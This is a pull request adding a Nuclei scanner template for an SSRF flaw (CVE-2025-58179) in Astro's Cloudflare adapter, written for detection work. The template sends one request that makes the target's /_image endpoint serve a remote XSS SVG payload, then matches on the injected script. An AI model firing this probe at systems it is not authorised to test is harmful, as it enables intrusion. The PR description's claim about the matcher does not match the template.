### PR TITLE
Add template for CVE-2025-58179

### DIFF
--- a/http/cves/2025/CVE-2025-58179.yaml
+++ b/http/cves/2025/CVE-2025-58179.yaml
@@ -1,40 +1,46 @@
 id: CVE-2025-58179
 
 info:
-  name: Astro Cloudflare Adapter SSRF Vulnerability
+  name: Astro Cloudflare Adapter - Server Side Request Forgery
   author: HoangAnhThai
   severity: high
   description: |
-    Detects SSRF vulnerability in Astro's Cloudflare adapter configured with `output: 'server'`
-    and the default `imageService: 'compile'`. The flaw allows bypassing domain restrictions on the /_image
-    endpoint, enabling unauthorized content delivery and potential SSRF/XSS attacks.
+    Astro is a web framework for content-driven websites. Versions 11.0.3 through 12.6.5 are vulnerable to SSRF when using Astro's Cloudflare adapter. When configured with output: 'server' while using the default imageService: 'compile', the generated image optimization endpoint doesn't check the URLs it receives, allowing content from unauthorized third-party domains to be served. a A bug in impacted versions of the @astrojs/cloudflare adapter for deployment on Cloudflare’s infrastructure, allows an attacker to bypass the third-party domain restrictions and serve any content from the vulnerable origin.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2025-58179
     - https://github.com/withastro/astro/commit/9ecf359
     - https://github.com/advisories/GHSA-qpr4-c339-7vq8
-  tags: ssrf,xss,astro,cloudflare
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-58179
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cve-id: CVE-2025-58179
+    cwe-id: CWE-918
+    cpe: cpe:2.3:a:withastro:astro:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    vendor: withastro
+    product: astro
+  tags: cve,cve2025,ssrf,xss,astro,cloudflare
 
 http:
-  - raw:
-      - |
-        GET /_image?href=https://placehold.co/600x400&f=svg HTTP/1.1
-        Host: {{Hostname}}
+  - method: GET
+    path:
+      - "{{BaseURL}}/_image?href=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg&f=svg"
 
     matchers-condition: and
     matchers:
-      - name: status
-        type: status
-        status:
-          - 200
-
-      - name: content-type
-        type: word
-        part: header
-        words:
-          - "Content-Type: image/svg+xml"
-
-      - name: svg-body
-        type: word
+      - type: word
         part: body
         words:
-          - "<svg"
+          - '<script type="text/javascript'
+          - 'alert(document.domain);'
+        condition: and
+
+      - type: word
+        part: content_type
+        words:
+          - "image/svg+xml"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### Summary
Add nuclei template for CVE-2025-58179: SSRF via /_image endpoint in Astro Cloudflare adapter.

### References
- GitHub Advisory: GHSA-qpr4-c339-7vq8 (https://github.com/advisories/GHSA-qpr4-c339-7vq8)
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-58179
- Issue: Fixes #13219

### Template Details
- Template tested locally using Nuclei
- Matchers check response body containing <!DOCTYPE html> from /_image endpoint
- File added: `cves/2025/CVE-2025-58179.yaml`

### Notes
- Tested in local Astro project (vulnerable @astrojs/cloudflare version <12.6.6)
- Ready for maintainer review
